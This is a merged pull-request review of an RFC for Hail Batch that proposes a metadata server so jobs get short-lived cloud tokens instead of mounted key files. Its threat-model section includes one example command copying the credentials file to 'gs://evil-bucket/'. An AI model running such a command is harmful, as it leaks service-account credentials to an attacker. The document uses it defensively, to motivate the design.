### PR TITLE
[batch] Add Batch job metadata server

### PR DESCRIPTION
**Pull request by daniel-goldstein**
This change describes the addition of a user-facing metadata server on the Batch Worker that jobs can use to obtain short-lived access tokens for their cloud credentials without relying on key files injected into the job's filesystem.

### CODE REVIEW

**Comment by daniel-goldstein** [comment]
oh my the rendering of the interaction diagrams is dreadful. I'll fix those and the links but in the meantime I would look at those in the un-rendered view.

**Comment by daniel-goldstein** [comment]
@danking just tagging you here because I don't know if you have notifications for this repo

File: rfc/0000-keyless-job-auth.rst [hunk 1]
```diff
@@ -0,0 +1,204 @@
...
+            number in the link, and delete this bold sentence.**
+.. sectnum::
+.. contents::
+.. role::
+
+In a Hail Batch pipeline, all user code runs under one of two identities associated
+with the underlying cloud platform. On the user's computer, code runs as the user's
+human identity. Inside a Batch job running in the cloud, the job is running as a
+Hail-managed identity created for that user on signup. We will refer to this
+identities as the user's Human Identity and the Robot Identity, respectively.
```
Comment (danking) [inline rfc/0000-keyless-job-auth.rst:23]: > We will refer to *these*

File: rfc/0000-keyless-job-auth.rst [hunk 2]
```diff
@@ -0,0 +1,204 @@
...
+
+In the current system, Batch jobs are given access to the users' robot identity
+through a file planted in the job's filesystem containing the identity's
+credentials. In GCP, the credentials are a GSA key file. In Azure, the credentials
+are a username/password for a AAD Service Principal. These credentials are created,
```
Comment (danking) [inline rfc/0000-keyless-job-auth.rst:28]: FWIW, Azure Active Directory has been renamed (to, afaict, everyone's great anger and frustration) Microsoft Entra ID.

File: rfc/0000-keyless-job-auth.rst [hunk 3]
```diff
@@ -0,0 +1,204 @@
...
+.. code-block:: python
+   j.command('gcloud storage cp $GOOGLE_APPLICATION_CREDENTIALS gs://evil-bucket/')
+
+Hail operators rotate GSA keys quarterly, so such an exfiltration could provide
+a malicious actor access to all resources granted to the robot identity for up
+to 90 days.
+
+Cloud providers avoid persisting long-lived credentials on user machines through
+the Metadata Server interface, an HTTP endpoint available on a
+`link-local https://en.wikipedia.org/wiki/Link-local_address`_ address which can
```
Comment (danking) [inline rfc/0000-keyless-job-auth.rst:49]: Huh! I never knew this about 169.254.0.0/16.

File: rfc/0000-keyless-job-auth.rst [hunk 4]
```diff
@@ -0,0 +1,204 @@
...
+-----------------------------
+
+Batch jobs access credentials on the filesystem through the
+``$GOOGLE_APPLICATION_CREDENTIALS``/``$AZURE_APPLICATION_CREDENTIALS``
+environment variables (EVs). Under this change, the files and EVs will still be
+available but their use will be deprecated in the documentation.
+
+Currently, Batch uses firewall rules to block access to the metadata server for
+user jobs, permitting users access would allow them to impersonate the batch worker.
+This proposal would allow packets from jobs destined to ``169.254.169.254`` but
```
Comment (danking) [inline rfc/0000-keyless-job-auth.rst:78]: It occurs to me, and I don't know if this is feasible, that it'd be great if we could somehow say that any packets leaving the VM either (a) are not destined for 169.254.0.0/16 OR they originated from the batch worker process.

File: rfc/0000-keyless-job-auth.rst [hunk 5]
```diff
@@ -0,0 +1,204 @@
...
+The following sequence diagrams illustrate how a Batch job obtains credentials
+to access a cloud resource in the current system and under the proposed change.
+The diagrams use GCP-specific terms and URLs, but the interaction is largely
+the same in Azure.
+
+
+Current System
+==============
+
++-----+                                                +-----+              +-----+
```
Comment (danking) [inline rfc/0000-keyless-job-auth.rst:93]: I think a simple triple-backtick will make this legible.

File: rfc/0000-keyless-job-auth.rst [hunk 6]
```diff
@@ -0,0 +1,204 @@
...
+-----------------------
+
+This change adds a method through which jobs can obtained short-lived access
+tokens without directly accessing long-lived credentials. With such a solution
+in place, we can eventually remove the long-lived credentials from job containers,
+mitigating the risk of exfiltration.
+
+So long as the firewall rules are correctly configured to redirect metadata traffic
+to the Batch worker, there should be no adverse interactions with the existing
+system as such traffic was previously forbidden.
```
Comment (danking) [inline rfc/0000-keyless-job-auth.rst:185]: Worth noting here that anyone who has been either explicitly reading the `/gsa-key/key.json` or explicitly using the environment variable will break once we remove the key mounts (which we really should do post-haste b/c they are a bit of a security nightmare).

I'm sure there's at least one user out there who is doing this explicitly in some Python script or whatever that they use in a Batch job. AFAIK, it should always be as simple as switching to the language-appropriate version of  `google.auth.default()`.

File: rfc/0000-keyless-job-auth.rst [hunk 7]
```diff
@@ -0,0 +1,204 @@
...
+do so, GKE runs the [GKE Metadata Server](https://cloud.google.com/kubernetes-engine/docs/concepts/workload-identity#metadata_server)
+which functions similarly to what is described in this proposal.
+
+The difference arises in how the metadata server fulfills the user's request for
+an access token. Unlike in this proposal, GKE nodes do not hold IAM credentials.
+Instead, it uses OIDC to "trade" a Kubernetes Service Account credential for a
+[preconfigured IAM credential](https://cloud.google.com/kubernetes-engine/docs/concepts/workload-identity#credential-flow). This has the advantage of not needing to distribute IAM
+credentials in GKE and enabling fine-grained mapping between GKE and IAM identities.
+However, OIDC is not easily applicable in Hail Batch because Batch is not an
+identity provider. We could remove the storage and distribution of key files in GCP by
```
Comment (danking) [inline rfc/0000-keyless-job-auth.rst:203]: The text as written is fine but I'll note that we *could*, in theory, be an identity provider for the robot identities. That would, in theory, allow seamless cross-cloud access to resources. In practice, `gcloud` does not appear to support using OIDC credentials. The OIDC situation in general seems very new.

**Review by danking — CHANGES_REQUESTED** [review]
Looks great, just two actionable comments: typo in introduction and mention the potential of a user who is relying explicitly on the env var or path.

File: rfc/0000-keyless-job-auth.rst (hunk 2 above)
Comment (daniel-goldstein) [reply rfc/0000-keyless-job-auth.rst:28]: Begrudgingly changed

File: rfc/0000-keyless-job-auth.rst (hunk 5 above)
Comment (daniel-goldstein) [reply rfc/0000-keyless-job-auth.rst:93]: we're in RST not markdown, but figured it out

File: rfc/0000-keyless-job-auth.rst (hunk 4 above)
Comment (daniel-goldstein) [reply rfc/0000-keyless-job-auth.rst:78]: I imagine we could cook this up in `iptables`, but I would maybe want to look first to see if that makes sense. Where would those packets even get routed to?

**Comment by daniel-goldstein** [comment]
@danking This should probably be merged since the functionality has merged?

**Pull request merged**